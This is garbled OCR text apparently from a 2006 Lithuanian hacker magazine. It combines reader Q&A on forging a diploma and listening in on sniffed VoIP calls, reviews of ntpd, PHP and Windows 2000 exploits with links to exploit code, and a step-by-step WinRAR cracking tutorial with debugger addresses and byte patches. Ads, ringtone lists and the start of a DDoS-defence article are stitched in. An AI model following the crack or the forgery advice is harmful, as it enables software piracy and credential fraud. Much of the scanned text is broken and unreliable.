Antrasis kelias paprastesnis ir ne toks reiklus finansams: 
čia padėtų ir primitwi S Merge (www.graphicutils.com/smer- 
ge). Priešingai nei Cerberis, programa nesugebės sukurti 
nuosavo ženklų dizaino, tačiau jau turimus sėkmingai už- 
dės ant bent kokio atvaizdo. Kitas klausimas, jog bet kuris 
darbdavys gali perkąsti tokius pokštus tiesiog paskambinęs 
į nurodytą diplome mokslo įstaiga ir užklausęs išduoto di- 
plomo galiojimo. 


(0) Apleidau mokslus, tačiau ruošiuosi atsispausdinti di- 
plomą su Photoshop'u. Kaip man ten įmontuoti van- 


Snifinau vieną tinklą ir supratau, jog gigabaitai surink- 
to šlamšto — tai pokalbiai per IP Kaip aš galėčiau 
sužinoti, apie ką ten buvo kalbama? 


Derėtų suprasti, kas buvo nusnifinta į surinktus logus. 
Jeigu ten vien tik telefoniniai pokalbiai, visa tai galima 
drąsiai sušerti programai apetitą žadinančiu pavadini- 
mu Vomit (vomit.xtdnet.nl). Jeigu tu prisisiuntei krūvą šlamš- 
to iš visur ir apie viską, tuomet derėtų pasinaudoti filtrais, 
po ko Vomit'ui perduoti tik Vo/P serviso logus. 


EKSPLOITŲ APŽVALGA 


NTPD REMOTE RO0OT EXPLOIT 


[Aprašymas] Kol visi normalūs žmonės 
šventė, hakeriams ir klaidų ieškotojams 
žemiškosios linksmybės nerūpėjo: jie ir 
toliau ieškojo pažeidžiamumų bei rašė 
eksploitus. Taip ir 2006 metais pasau- 
lis sužinojo apie naujas žymiuose pro- 
duktuose aptiktas saugumo skyles. Pa- 
vyzdžiui, toks pažeidžiamumas buvo ap- 
tiktas *nix'iniame demone ntpd, kuris 
skirtas laiko sinchronizavimui globalia- 
me tinkle. Kaip tu tikriausiai žinai, į šį 
serverį besikreipiantis klientas vietoje 
atsakymo nori tikslaus laiko. Po to de- 
monas klientui pasiunčia neįmantrių 
skaičių seką. Vienas protingas Žmogus 
nusprendė ntpd pasiųsti padirbtą už- 
klausą su pertekliniais simboliais f- 
nale ntpd tiesiog pakratė kanopytes :). 
Po neilgai trukusio būrimo hakeris pa- 
rašė galingą eksploitą, kuris gali sukur- 
ti suid'inį shellą /tmp/sh. 


[Apsauga] Apsaugos nuo šio pažei- 
džiamumo kol kas nėra. Taigi kol ne- 
bus išleista nauja ntpd versija, geriau 
išjunk skylėtą demoną arba nepagei- 
daujamiems potinkliams filtruoti pa- 
naudok ugniasienę. Tikimės, jog grei- 
tai bus išleisti pataisymai arba nauji 
ntpd leidimai. 


[Nuorodos]Eksploitą gali rasti adresu 
www.securitylab.ru/poc/extra/ 
246196.php. Komentaruose tu rasi pa- 
pildomos techninės informacijos apie 
ntpd pažeidžiamumus. 


[Blogio įvertinimas ir potencialas] 
Reiktų pastebėti, jog šis kūrinys kol kas 
dar nėra panašus į remote exploit. Taip, 
eksploitas moka išnaudoti šią saugumo 
skylę. Jis taip pat gali sukurti /tmp/sh su 
4755 bitu. Tačiau grėsmingasis eksploi- 
tas negali pažeidžiamame tinklo mazge 
padaryti bind(). Dėl to mes manome, kad 
ntpd-exp.c — tai lokali unix sistemų eks- 
ploatavimo priemonė :). 


[Sveikinimai] Šį kartą išsiskyrė lenkų ha- 
keriai: eksploitą parašė mūsų kaimynas, 
slapyvardžiu venglin (venglin(dOfre- 
ebsd.lublin.pl). Rašykit laiškus ir laukit 
atsakymo :). 


PHP <= 4.4.0 
MYSOL CONNECT() BOF EXPLOIT 


[Aprašymas] Sausio pradžioje hakeriai 
mus nudžiugino nauja egzotiška PHP sky- 
le. Klaida buvo surasta mMysą! connect() 
funkcijoje, kurią išnaudojus gali būti įma- 
nomas bet kokių sisteminių komandų vyk- 
dymas. Šis pažeidžiamumas pasirodė 
esąs ganėtinai naudingas, kadangi admi- 
nistratoriai paprastai uždaro visas sys- 
tem(), exec(), passthru() ir kitų pavojingų 
komandų naudojimo galimybes. Jų alter- 
natyva slypi pažeidžiamo mysą! connect() 
išnaudojime :). 

Tiesa, klaida aktuali tik Windows siste- 
moms ir ketvirtos versijos PHP (mūsų lai- 
kais naudojama būtent tokia kombinaci- 
ja). Eksploatavimo esmė — funkcijai su- 
šeriamas padirbtas nutolusio mysą! ser- 
verio argumentas, kuriame if saugomas 
shell kodas. Dėl banalaus buferio perpil- 
dymo kodas yra sėkmingai įvykdomas. 


[Apsauga] Džiugiai pranešu, jog proble- 
ma šiuo metuneišsprendžiama. Tai reiš- 
kia, kad, atrodytų, daugybė apsaugotų Win- 
dows kompiuterių šiuo metu yra taikiklyje. 


[Nuorodos] Techninė klausimo pusė ir 
eksploatuojančio kodo fragmentai yra čia: 
www.securitylab.ru/poc/extra/ 
243730.php. Išsamesnį klaidos aprašy- 
mą galima rasti adresu www.security- 
lab.ru/vulnerability/source/ 243713.php. 


[Blogio įvertinimas ir potencialas] Jei- 
gu eksploitui būtų keliami apribojimai (Win- 
dows, PHP 4.x), hakerių džiaugsmas būtų 
beribis. Tačiau galima nulaužti ir kitas PHP 
versijas, tiesiog tokiu atveju bus kitas po- 
slinkio adresas. Jo aptikimas — tavo pa- 
grindinė užduotis :). 


[Sveikinimai] Šį eksploitą pagimdė pro- 
tingi žmonės iš komandos SecWatch.org. 
Slapyvardžiai, pašto adresai, ICO nume- 
riai ir kitos intymios detalės nėra viešina- 
mos, todėl informacijos ieškok pačioje 
svetainėje :). 


MS WINDOWS APC 
LOCAL EXPLOIT (MS05-055) 


[Aprašymas] Pabaigai papasakosiu 
apie naują Windows 2000 eksploitą. 
Ši, atrodytų, sena operacinė sistema 
iki šiol naudojama kaip „stabili“ ser- 
verinė OS (ką jau čia slėpti, net man 
teko ją naudoti terminalų serveriui pa- 
leisti). Neseniai paaiškėjo, kad apdo- 
rojant APC (asinchroninis procedūrų 
iškvietimas) elementų sąrašą galima 
klaida, kuri sukelia teisių sukėlimą 
(savaime suprantama, iki SYSTEM-u- 
ser lygio). Tam klaidų ieškotojai su- 
kūrė dvi bylas: pirmoji yra pagrindinė 
eksploito programa, o antroji — hel- 
per byla, atliekanti dar ir patį siste- 
mos eksploatavimą. Perdavus 
„Main.exe helper.exe“ tipo komandą 
įvyks stebuklas, po ko hakerio teisės 
bus didesnės. 


[Apsauga] „Microsoft“ gana greitai 
sureagavo į šį saugumo incidentą ir 
išleido Win2k skirtus pataisymus. 
Juos pasiimti galima iš www.micro- 
soft.com. 


[Nuorodos] Eksploita gali rasti čia: 
www.securitylab.ru/poc/extra/ 
243700.php. Nuorodos į technines pa- 
žeidžiamumo detales neduosiu, kadan- 
gi papildoma informacija kol kas nėra 
viešinama. 


[Blogio įvertinimas ir potencialas] 
Sena gera Win2k visada garsėjo savo 
klaidomis. Dabar hakeriai į „Micro- 
soft“ daržą įmetė dar vieną akmenį. 
Aš manau, kad naujos Windows 2000 
klaidos atradimas mažai ką nustebi- 
no, o šiaip dabar kur kas aktualesni 
WinXP/2003 skirti eksploitai. Nepai- 
sant to, šis ginklas tikrai ras savo vie- 
tą rimto įsilaužėlio arsenale :). 


[Sveikinimai] Draugiškai dėkojam ha- 
keriui SoBelt. 


' t skio 6 m? 
V T Kaj As a 
AMILO A1650 G 
Lengvai pamėgstamas, tačiau nelengvinantis piniginės: „Mobile AMD* Athlon 4000+64 procesorius 4000+ 
„Microsoft* Windows" XP Home“ operacinė sistema 
atraskite darbo kompiuteriu mobilumą su AMILO A1650 G 15,4“ WXGA plačiaformatis ekranas 
Lizdas „Multimedia Card“ ir „Secure Digital Card“ 
Trūksta laisvės ir pramogų, kurias suteiktų nešiojamasis kompiuteris? formatų atminties kortelėms 
T? ž a p jį ž ž 512 MB atmintinė 
Susipažinkite su patraukliu naujuoju AMILO A1650 G. Jame yra viskas, ko tik galėtumėte p 
prašyti: į akis krintanti puiki išvaizda, dosnus galimybėmis plačiaformatis ekranas, vaizdą Radeon Xpress 200 iki 128 MB 


atkuriantis nuostabiai tiksliai, taip pat galingas „AMD* Athlon"“ 64" procesorius. 

Athlon | Visa tai - už išskirtinai prieinamą kainą. Tad ką bepasirinktumėte veikti - žiūrėti filmą, 3 3 8 7 Lt 
susirašinėti su draugais el. paštu, tvarkyti savo nuotraukų albumą keliaudami - veikti tai su 
AMILO A1650 G bus kur kas smagiau. NS 


Daugiau informacijos žr. interneto svetainėje www.fujitsu-siemens.com/amilo 
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WinRAR skirtas pleistriukas 


VISI MES ŽINOME DID)JĮ EUGENIJAUS RO- 
ŠALIO KŪRINĮ, KURIS GALI SUPAKUOTI IR 
IŠPAKUOTI VISUR IR VISKĄ. TIK ŠE TAU, KAD 
NORI — UŽTAI, KAD ARCHYVATORIUS VEIK- 
TŲ KAIP PRIKLAUSO IR NEIGRISTŲ BJAU- 
RIAIS LANGELIAIS SU PRAŠYMAIS UŽMO- 

KĖTI PINIGUS, REIKIA ATSISVEIKINTI SU 29 
DOLERIAIS. NEZINAU, KAIP TAU, BET MAN 
MANO STIPENDIJOS TAM TIKRAI NEUZTEN- 
KA, TODĖL AŠ NUSPRENDZIAU EITI KITU 
KELIU, O TUO PACIU IR PATRENIRUOTI SA- 
VO SMEGENIS. PASIRODO, NULAUZTI WIN- 
RAR — PAPRASCIAU NEI PAPRASTA! TUO- 
JAU PAPASAKOSIU, KAIP AS TAI PADARIAU. 


Populiaraus archyvatoriaus 


nulaužimas — tai labai lengva! 

[Kam mokėti?) Iš tiesų, ar taip jau reikia registruoti Win- 
RAR, kuo gi jis taip įgrysta? Tiesą sakant, programa vei- 
kia pakankamai liberaliai: net ir pasibaigus bandoma- 
jam laikotarpiui (trial), ji nepraranda funkcionalumo. Ta- 
čiau 30 dienų eigoje kiekvieną kartą paleidus programą 
pasirodo užrašas apie tai, jog tu nesuradai laiko sumo- 
kėti pinigėlių. Nuo to išsivysto stiprus nepilnavertiškumo 
kompleksas, kuris smogia per mano išklerusią psichiką 
kaip kūjis per priekalą, juk jeigu aš nesumokėsiu pinigė- 
lių, po 40 programos naudojimo dienų programa pradės 
mane užknisinėti nagais — langais su prašymu regist- 
ruotis! Žodžiu, bendrai paėmus ši programa elgiasi iš tik- 
rųjų bjauriai. Todėl aš ir papasakosiu graudžią jos nulau- 
žimo istoriją. Be abejo, vien tik švietėjiškais tikslais. 


BT- Geras.com 


[Ko mums prireiks] Vaisingam auklėjamajam darbui mums 
prireiks w32dasm disasemblerio, pataisymų kūrimo programos 
Codefusion, ollydbg derinimo įrankio, hiew tipo šešioliktainio 
redaktoriaus ir kokio nors padoraus resursų redaktoriaus (tar- 
kim, reshacker arba peid). Dabar aš papasakosiu, kaip man 
pavyko nulaužti WinRar, bei aprašysiu savo svarstymų logiką. 


„DialogBoxParam“ — ištrauka iš dokumentacijos 
function DialogBoxPoram(Instance, THandle; TemplateName: PChar; Parent: HWnd; Dia- 
logFunc: TFarProc; InitPoram: Longint): Integer. 


Sukuria su TemplateName apibrėžto modalinio dialogo bloką, 
o prieš atvaizduojant dialogą pasiunčia pranešimą wm InitDia- 
log. Taip pat leidžia perduoti pradinį grįžtamojo iškvietimo funk- 
cijos parametrą. 


Argumentai: 


* Instance. Modulio egzempliorius, kurio vykdomojoje byloje saugomas dialogo bloko šablonas. 
* TemploteName. Dialogo bloko šablono pavadinimas (baigiasi tuščiu simboliu) 

* Parent. Tėvo langas 

* Dialogfunc. Dialogo funkcijos procedūros egzemplioriaus adresas 

* InitParam. Perduodamas wm InitDialog pranešimo paramelre /Poram. 


Jeigu dialogas negali būti sukurtas, funkcija grąžina procedūros End- 
Dialog parametrą nResult arba -1. Funkcija yra user32.dll byloje. 


[Let's go] Visų pirma aš paleidau peid ir atidariau winrar exe'- 
ką. Pasirodo, programa su niekuo nesupakuota ir dar priedo 
parašyta su C — tiesiog idealus man skirtas variantas. Savo 
bandymus aš nusprendžiau pradėti nuo to, kad atsikratyčiau 
nagų ir pašalinčiau „Neregistruotos versijos“ užrašą. Tam aš pa- 
leidau Olly ir jame atidariau WinRar. Po to nurodžiau breiką (bre- 
akpoint) į nagą iškviečiančia funkciją: 


Bpx DiologBoxParamA 


Čia DialogBoxParamA — tai funkcijos, parodančios langelį su 
registravimosi prašymu, pavadinimas. Dabar reikia paleisti pro- 
gramą ir laukti, kol jos vykdymas bus nutrauktas iškvietus kon- 
troliuojamą funkciją. Spaudžiam enter, po to 9, ir viskas gau- 
nasi tiksliai taip, kaip mes ir planavome, su Olly ateiname adre- 
su 00440f6e ir ten matome štai tokį kodą: 


Kodas, iškviečiantis nago parodymo procedūrą 


00440F56 6A00  PUSH 0; /IParam = NULL 

(0440F58 .68 F444400 PUSH WinRAR.00444FF4 
00440F5D „FF35 1C164800 PUSH DWORD PTR DS:[48161() 
00440F63 68 E15F4900 PUSH WinRAR.00495FE1 
00440F68 „FF35 EOF94900 PUSH DWORD PTR DS:[49F9E0] 
00440F6E „EB 67F30400 


(ALL < JMP.RUSER32.DialogBoxParamA > 


Aš nuspaudžiau F8 norėdamas nueiti eilute toliau, ir pamačiau, 
kad pasirodė nagas. Kaip tik tai, ko ir reikia. Užrašęs adresą, aš 
išėjau iš Olly ir perėjau prie Hiew. Pasirinkęs mode-decode ir 
nuspaudęs goto, aš įvedžiau gautą adresą su tašku pradžioje ir 
ten pakeičiau 5 baitus, juose įrašęs 90, t.y. tiesiog įrašiau NOR 
po ko išsaugojau bylą ir išėjau iš Hiew. Dabar atėjo laikas paban- 
dyti paleisti archyvatorių. Du kartus spustelėjęs pažįstamą nuo- 
rodą, aš supratau, kad jau spėję atsibosti nagai prapuolė, tačiau 
liko užrašas viršuje, kuris gadina visą efektą. Nusprendžiau jį iš- 
trinti tiesiog pakeisdamas šią antraštę su resursų redaktoriumi. 
Tam aš su reshacker atidariau WinRAR, suradau eilutę „Nere- 
gistruota kopija“ ir pakeičiau ją kai kuo malonesniu. Štai ir vis- 
kas, taip aš ir nulaužiau WinRar. Elementaru, tiesa? Paprasčiau- 
sias pavyzdys, paprasčiausias krekas. Ir dabar pasakyk, kad pats 
nesusitvarkysi su kažkuo panašaus. Tačiau aš savo pasakojimo 
dar nebaigiau. Pats supranti, kad daryti visus šiuos dalykus ranki- 
niu būdu nelabai smagu. Dėl to man kilo prasmingas noras pa- 
togumo dėlei sukurti pilnavertį pataisymą. 


[Kuriam pataisymą] Aš naudojausi kieta (man :)) pataisymų 
kūrimo programa codefusion. Ji veikia pakankamai paprastai. 
Jai perduodamos dvi bylos: originali ir pataisyta. Ji nustato skir- 
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Nagų veikimas 


Tavo mėgiamas žumalas 
nepavargsta savo myli- 
miems skaitytojams pri- 
minti, jog už savo mielus 
darbelius galima pakliūti į 
nemielas vietelės. Taigi at 
sarglau +, O dar geriau 
neužsilminėx niekais ir ne 
pažekdinėk savo šalies įsta 
tymų. 


http://cracklab.ru/dow- 
nioad/get.php?g- 72 
oilydbg 

http: //cracklab.ru/dow 
nioad/get.php?g=5 
hiew 


hip://cracklab.ru/dow 
nioad'/get.php?g=23 
restorator 
http:/Avww.cheatsmaxi- 
mal.net/dovnioad/oois/ 
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tumus tarp jų ir automatiškai 
generuoja pataisymo kodą. 
Naudotis codefusion papras- 
čiau nei paprasta. Pataisymo 
lange pasirenkame antraštę ir 
tekstą, spaudžiame next, po to 
išsirenkame taisomą bylą, o 
data to patch lange spaudžia- 
me dešinį pelės klavišą ir pa- 
sirenkame file compare. Čia 
nurodome originalią ir patvar- 
kytą bylas, programa jas suly- 
gina baitą po baito, po ko au- 
tomatiškai generuoja exe tipo 
pataisymą, kurį galima pateik- 
ti krekerių forumuose :). 


patch/code!s30.21p 


codefusion [Antrasis būdas] Patiko? Da- 


bar patiks dar labiau. Aš apra- 
šysiu dar du būdus, kaip nulaužti šį nelaimingą archyvatorių. 
Kaip tu jau tikriausiai spėjai pastebėti, nagas pasirodo tik po 
40 dienų. O kas gi vyksta iki tol? Nežinai? Nesimaivyk, viską tu 
žinai. Skaičiuojamas laikas. Dešimtainis 40 šešioliktainėje sis- 
temoje yra 28, o tai reiškia, kad programoje kažkas sulyginama 
su 28h. Norint suprasti, kur būtent ir kas sulyginama, pasinau- 
dosime w32dasm. 
Sulyginamas atliekamas su operatoriumi cmp, todėl dasm'e 
spaudžiam search= >find text it ten surenkame getl/ocaltime, 
kadangi būtent ši funkcija atsako už kompiuterio laiko nustaty- 
mą, iš ko išplaukia, jog po jos eis likusių dienų paskaičiavimas. 
Todėl po to, kai mes surandame šios funkcijos iškvietimą, de- 
rėtų peržiūrėti kodą ir jame ieškoti skaičiaus 00000028. Iš tie- 
sų nesudėtinga pastebėti štai tokį kodą: 


00440F46 „83F8 28 (MP EAX,28 

00440F49 „TF04 16 SHORT WinRAR.00440F4F 
00440F4B „8500 TEST EA EAX 

00440F40 „7024  JGE SHORT WinRAR.00440F73 


Čia skaičius iš EAX registro sulyginamas su 28h (tos pačios 40 
dienų). Jeigu EAX turinys didesnis arba lygus 28, tai peršokama į 
00440F4F, o jeigu ne, tai atliekamas sulyginimas su O ir šuolis 


PE PEID v0.92 


File: |C:|Program Files WinRAR| WinRAR. originai.exe Lai 


EP Section: [text ||| [>] 
First Bytes: |EB,10,66,62 |> | 
Subsystem: |Winaz GUi | |>] 


Entrypoint: |00001000 
File Offset: |00000600 
Linker Info: [5,0 


MI TTT TTT 


FP štayontop [2] >] 


Pid apie programą gali papasakoti daug naudingų dalykų 


31] 


[HAKERIS 03 [34] 06 


32) 


[HAKERIS 


JGE nurodytu adresu, peršokant nagą iškviečiančią procedūrą. 
Tam, kad WinRar peršoktų šią procedūrą, reikia, kad EAX būtų 
mažesnis už 28h, todėl aš tiesiog nunulinau šį registrą su eilute 
xor eax, eax ir su Hiew nuspaudęs edit= >asm užNOPinau kitus 
3 baitus. 

Viskas. Nagų nėra, o ką daryti su lango pavadinimo eilute? Be 
abejo, būtų galima vėl ją pataisyti su resursų redaktoriumi, ta- 
čiau mes įvairovės dėlei pasielgsime šiek tiek kitaip. Pabandy- 
sime paieškoti šios eilutės pačiame dasm'e ir ištaisysime ją 
rankiniu būdu. Mes žinome, jog pavadinime yra žodis WinRAR. 
Jo paieškojus galima surasti štai tokį kodą: 


00448353 |. 68 ED6B4900 PUSH WinRAR.00496BED 

00448358 |. 804424 08 LEA EAX,DWORD PTR SS:[ESP --8] ; 
0044835C |, 50 PUSH EAX ; |Argl 

00448350 |. E8 02E00300 CALL WinRAR.00489364 

00448362 |. 83C4 OC A DD ESP, OC 

00448365 |. 8030 BCF94900 > CMP BYTE PTR DS:[49F98C,0 

0044836C |. 75 7A JNZ SHORT WinRAR.004483E8 

0044836E |. Al (8434800 MOV EAX,DWORD PTR DS:[4843C8] 
00448373 |. 83F8 14 CMP EAX,14 ; sulyginimas su 14h(20dec) 
00448376 |. 7C05 JL SHORT WinRAR.00448370 

00448378 |. 83F8 28 (MP EAX,28 ; sulyginimos su 28H(40dec) 
00448378 |. 7C10 JL SHORT WinRAR.0044B39A 


Dabar jeigu pabandytume prisiminti WinRar veikimą, paaiškė- 
tu, kad po 20 naudojimosi dienų į antraštę įterpiamas kiek 
kitas tekstas. Taigi žiūrim į kodą. Pirmuoju atveju EAX sulygina- 
mas su 20, 0 antruoju — su 40, po ko tu pasiunčiamas tam 


Gg +: URSoft W32Dasm Ver 10 Program DisassemblerDebugger 
Disassembler Edit Project Debug Search Goto Execute Text Functions HexD 


de Offset = 00000600, Code Size = 0008F800 
a Offset = 0008FE00, Data Size = 0000C800 


ber of Ūbjects = 0007 (dec), Imagebase = 00400000h 


ObjectO0l: „text RVA: 00001000 Offset: 00000600 Size: 0008F£ 
ŪbjectO2: „data RVA: 00091000 Offset: 0008FE00 Size: 0000CE 
Ūbject03: „tis RVA: 000DS000 Offset: 0009C600 šize: 000001 
Objectū4: „rdata  RVA: 000DA000 Offset: 0009C800 Size: 000004 
ŪbjectO5: „idata BVA: 000DB000 Offset: 0009CA00 Size: 000026 
ObijectO6: „edata  BRVA: 000DE000 Offset: 0009F000 Size: 000004 
ŪbjectO?: „rsrc RVA: O00DFO000 Offset: 0009F200 Size: 00031( 
+44444+44444+4444 MENU INFORMATION +44++44++++44+4+++4 
ber ot Henus = 2 (decimal) 
| MENU 
409; įPopup) 
UB:8KBL 0882 Ctrl+0 IID=0065h] 
OK1A0BL 48A: Ctrl+D (Popup) 
[ID=0( 
OK180BL ?07:C Ctrl+T [ID=0067h] 
008>;L Ctrl+P [ID=0068h) 


< 
| Line:0 Pg 1 ot 3330 File: WinRAR exe 


w32dasm — labai naudingas dalykėlis, ypač kovai su nesudėtingomis apsaugomis 
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beveik visagalis ollydbg 


tikrais adresais, kur funkcija atkuria skirtingas antraštes. Taigi 
mes čia pasielgsime taip pat, kaip ir prieš tai: nunulinsime EAX 
ir užNOPinsim tolimesnius baitus. Dabar antraštėje nebus jokių 
užknisančių užrašų, 0 tu galėsi pasijusti tikru krekeriu. 


[Pabaiga] Štai, tiesą sakant, ir viskas. Šiandien tu sužinojai, 
kaip dviem skirtingais būdais nulaužti Windows vartotojui nepa- 
keičiamą programą. Have a nice day, bičiuli, ir sėkmės tau atei- 
ties darbuose. 


D WinRAR - WinRAR 


Ele GCommands Tools Favgrikes Options Help 


ET MTTS 


Add ExtractTo Test View 


I ZL 


3/3/2006 10:24... 
10/7/2005 3:08.... 


1,111 IONFIe 6/2/2005 4:05 PM 
502 DIZ File 10/1/2005 10:0... 
4,482 Text Document 5/24/2004 9:02... 
3,121 HTML Document 8/3/2005 10:31... 
298,496 BAK File 10/7/2005 3:05... 
298,496 Application 10/7/2005 3:05... 
66,711 Text Document 10/1/2005 10:0... 
125,440 Application Extension = 10/7/2005 3:05... 
43,008 Application Extension | 6/7/2005 12:26... 
44,032 Application 6/7/2005 12:28... 
1,082 LSTFie 9/7/2002 12:36... 
481 Registration Entries 3/3/2006 10:34... 
1,687 Text Document 5/12/2005 6:01... 
9,042 Text Document 10/1/2005 10:0... 
98,304 Application 10/7/2005 3:05... 
651 LSTFie 10/7/2005 3:05.... 
196,144 Application 10/7/2005 3:05... 
90 Text Document 5/12/2005 6:02... 
11,942 Text Document 10/1/2005 10:0,. 
Ia! £ AŽ Total I folder and 


mūsų darbas nenuėjo perniek 


Yva - Paukštelis 


Naujieji lietuviai - Ruri ruri 
Naujieji Lietuviai - Afygenai 
Alex F- Grazy frog 
BRIGADA-BUMER remix 
Soundtrack - Bumer 

Ž. Žvagulis - Alaus nėra danguje 
Crazy Frog - Popcom 

Vaidas - Myliu(Kastaneda cover) 
Ž. Žvagulis - Faina 
AC/DC - Thunderstruck 
Arash - Boro Boro 

TV- Ogis ir tarakonai 
Raketa - Mūsų tai neliečia 

Yva- Berniukams 

Rasa- Medžiai be lapų 

Vaiters 4 Kaža- The War Is Not Over 
Ruslana Lyzhichko - Wild Dances 
Liube - Davaj za 
Shakira - La Tortura 


Kodas: WO 
Mais 1106 1200, PAGO ASA i, 
1464, 4701. 1148 6070 9706 070. 


Kodas: MOTO 2 

Ncėia 100 1200 1400 1574 5640 

MON 6020 6* 00 AR 6070 ADD 

4000 0000. 00 10 AA 104, 62 k 
14 7754 77804 7700. 7014 70041 

Nag Nago 

Noreg vos Talo AN MO 


Kodas: KINGK 
Isės 2684. 79406. 9720 1296 XU2A KĄ, 
MN9AR 9100, 5743 6028, 6201 4241 62 KA. 


Kodas: ICEAGE 

Nokia 2453 1104 100 170 410 0856. 
M 90 6 60J0 1106 6206 Ai 
JM 008), 660 6610 6410 06 860 
on, ed2t, 7714 TA Taa, Teka, ja 
MANO Nanga Motoroja VKI V500 VI24 
Neomera (45, CN7C MAS. 165 

orų Lions ASK, MAG, AD AS 

wa 40 


Kodas: 
Noi AU ADO) 1270 K A, A 
3846) es, 1100, 1140, 8020, 8100 4226 
KINŲ 6280 40C, 4474 6670, 66N 4670 
I64C, WC, 6426 7700, 7710 7750, 7280 
MSN Goja Namų DO IC 
1 Kortina NA K 
“ T si 
AEK, o, Nash, is, K A, i se1a 2800 
Tri6 TshO vida 74714 2500 


1. Rašyk žinutę: 
Siųsti draugui: 


2. Siųsti numeriu: 
10Lt 


Ir susirask 


vakarėlis mieste! 


1. Rašyk žinutę: 2. Siųsti numeri 


3. Sek tolimesnius nurodymus Kaina 


Lietuviškos ||| Hip 


Vilija - Sojaudau + gaudau 
Raketa - Mis ta neieča 
Rulė ir Kastaneda - Pažiūrėx | mana pupyte 
4 Vudis Ir Geltona - Du kart du 
Andrius - Mas vyrai ANDYYR 
. 44 Mino ir Vilija - Vvo per ai MINYILYI 
4 lino - Sauėtam pay as Vilija - Tu Kvalys VILTUKY 
Rule - Prakaitas - Plunksnos Vudis - Lamingas VUDLAG 
Vudis Vilija Mino Donata - Ei na na Naujieji lietuviai 2ecer: NUPEDAS 
Žygis - Kaliooėi Andrius - Niesek sau rūbų gre kasų ANDNESEX 
44 avarija Ir Violeta Riaubiškytė - Aš tavo BAVIOL Yva - Tk ai rikiai YVATIKAS 


Įvairios RT T 


VILISP 

RAKETMŲ 
RULEKAST 
VUDISG0U 


4: Goriliaz - Fes: Good Inc 
Ludacris - Act a 0. 
50 Cent + Hata * Or Love I 
44 Jay 2 and Linkin Park - Nuoby'Enooro 
A 50 Cent PMP 
The Game - How We Do 
Black Eyed Paas - Shut Uz 
44 Omx- X Goa Gve It To Ya 
Jay-Z And Linkin Park - 35 Problems 
50 Cant - ir Da Cb 
Nelly feat Tim McCraw - Over and Ove | 
D-12- My Band 
4š 50 Cent feat. Olivia Candy Shop 


| 44 Kaiducli - Dragosisa Din Te 

Mario - Lel me love you 

O-Zone - Despra Tie 

| One T - The Magic Kay 

4 Britney Spears - Toxic 
Britney Spears - Everytrmo 
Gwen Stefani feat. Eve - Rich Giri 


i. Žvaigždžių karai 
OGIS Ir tarakonai 
Pietų parkas- Jreje "una 

4 Serioga- Comyj BUMER 
James Korner - Tžanic 
Mission Impossible 

4 Baiman 
Groove Armada - Sex And The Čiy 
Rožinė Pantera 
Shrek 2 - Hokdrg Od For A Haro 

| | Frank Sinatra - Svangers r The Noht „KinBM Vol 1- Bang Bang 

| 44 Boney M - Dadėy Coci M : 

Depeche Mode - Erioy The Silence Ž 

Tom Jonas - Serbarė 


Ov8 y0L 


Sei ir A. Mamontovas - saulės mestas ANDSAULM 
44 Linas ir Simona su T. Beard LINASLOY 
4 Madonna - rą Up In Culto - Suk suk rate INCSUK 
Mattaliu - Bi Ciy Lie 
4 Raksta - | udą. 


44 Juanes - i Larisa negra 
1 Vaidas - Vy Kastaneda Cowwt) 
Rasa - Medžai bė apų 
The Killers Somebody Toki Me 
44 White Stripes - Biue Orchid 


2. Žvagulis su Geltona - Ir rieko Gaugau 
x Žilvinas Žvagulis - taiška darotė 

Moksila - Pasauės gražus 

Cisco Kid - Snapis - mažas kromodias 

Funky - Mre pe nravilss doCZ 


Mango - "1 he sadows 


| M Mikutavičius - 3 Miorai 


Inculto - Je abai nor: 


ZVAGIRN 


4 Eminem - As! Lose I! 
Eminem - Srg for Ihė momeni 
Eminem - The Way | Am 


BUSINESS 
CLOSET 
NAILIES 


| 4 Madonna Lis A Vigi 


Aerosmith » Cry“ 

The Verve - Bitiarswee! Syrgborny 

The Beatles - Ai You Need is Love 
44 Eivis Presley - Have | Toli Yo Lainė That 
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Ar yra 
gyvenimas po „DD0S'u“? 


MASINIUOSE LEIDINIUOSE DDOS TEMA AP- 
TARTA KUO ISSAMIAUSIAI. DAUGELIS AU- 
TORIŲ RAŠO APIE DDOS ATAKAS, APIE JŲ 
VYKDYMĄ IR APIE PASEKMES, TAČIAU MA- 
ŽAI KAS SUSIMĄSTO APIE APSISAUGOJIMĄ 
NUO PANAŠIŲ UŽPUOLIMŲ. KUOMET GA- 
LUTINIS VARTOTOJAS PATS SUSIDURIA SU 
TOKIA ATAKA, JIS SAVAIME SUPRANTAMA, 
JIS NEZINO, KĄ DARYTI IR KUR BĖGTI. IS 
TIESŲ TAI NIEKUR BĖGTI NEREIKIA — PA- 
KANKA PERSKAITYTI ŠĮ STRAIPSN]. 


Apsisaugojimo nuo stambaus masto 


užpuolimų metodai 

[Akis į akį su problema] Vieną kartą, kuomet mano 
globoje buvo pakankamai stambus resursas, aš susi- 
dūriau su rimta problema. Kažkas prieš mano projektą 
užsakė stambaus masto DD0S ataką. Užpuolimo simp- 
tomai buvo akivaizdūs: pabandžius kreiptis į svetainę, 


, !I 


Apache juodai stabdė ir turinį grąžino tik po dešimties minučių. 
Užėjus į konsolę, sshd demonas iš viso neatsakinėjo į mano 
užklausas. Iš pradžių pamaniau, kad serveryje nutiko kokia nors 
nesąmonė, todėl paprasčiau savo duomenų centro perkrauti 
mašiną (projekto svetainė buvo įkurdinta JAV esančiame išskir- 
tiniame serveryje). Po neplanuoto perkrovimo man vargais ne 
galais vis dėlto pavyko prisijungti prie Konsolės. Tai, ką aš ten 
pamačiau, žodžiais neaprašysi. Procesoriaus apkrovimas nuo- 
lat laikėsi ties 10076, o Load Average siekė 160. Tereikėjo man 
nužudyti httpd procesą, kai mašina atgijo, o apkrovimas greitai 
nukrito iki nulio. Paaiškėjo, kad botai užklausomis užvertė WWW 
servisą. Problemą reikėjo kažkaip išspręsti, ir tik tada aš supra 
tau, jog nėra racionalų apsisaugojimo nuo DDOS metodų. 

Daugelis autorių savo straipsniuose rekomenduoja kreiptis į tie 
kėją Ir paprašyti administracijos su aukščiau stovinčia ugniasie- 
ne nufiltruoti tam tikrus IP adresus. Si mintis gera tuo, kad 


vartotojui iš viso nereikia kvaršinti galvos užpuolimais, tačiau šis 
metodas veikia toli gražu ne visada. Kai aš duomenų centro 


administracijai laišku pranešiau apie ataką, jie tiesiog gūžtelėjo 
pečiais ir atsakė, kad nieko nesiruošia daryti. Atseit, tu pats turi 
savo ugniasienę, tai su ja ir ginkis. Beje, panašią politiką taiko 
daugelis išskirtinių serverių tiekėjų. Iš šono tokia situacija atro- 
